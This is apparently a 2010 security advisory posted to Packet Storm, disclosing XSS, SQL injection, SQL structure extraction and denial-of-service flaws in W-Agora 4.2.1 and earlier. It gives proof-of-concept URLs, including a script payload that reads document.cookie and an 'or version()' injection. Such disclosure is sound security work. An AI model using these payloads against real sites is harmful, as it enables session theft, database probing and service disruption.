Hello Packet Storm! I want to warn you about Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection and Denial of Service vulnerabilities in W-Agora. SecurityVulns ID: 11324. ------------------------- Affected products: ------------------------- Vulnerable are W-Agora 4.2.1 and previous versions. ---------- Details: ---------- XSS (WASC-08): http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1 SQL DB Structure Extraction (WASC-13): http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1 SQL Injection (WASC-19): http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1 DoS (WASC-10): http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25 http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern= http://site/current/list.php?site=support&bn=support_news ------------ Timeline: ------------ 2010.10.30 - announced at my site. 2010.11.01 - informed developers. 2010.12.25 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4650/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua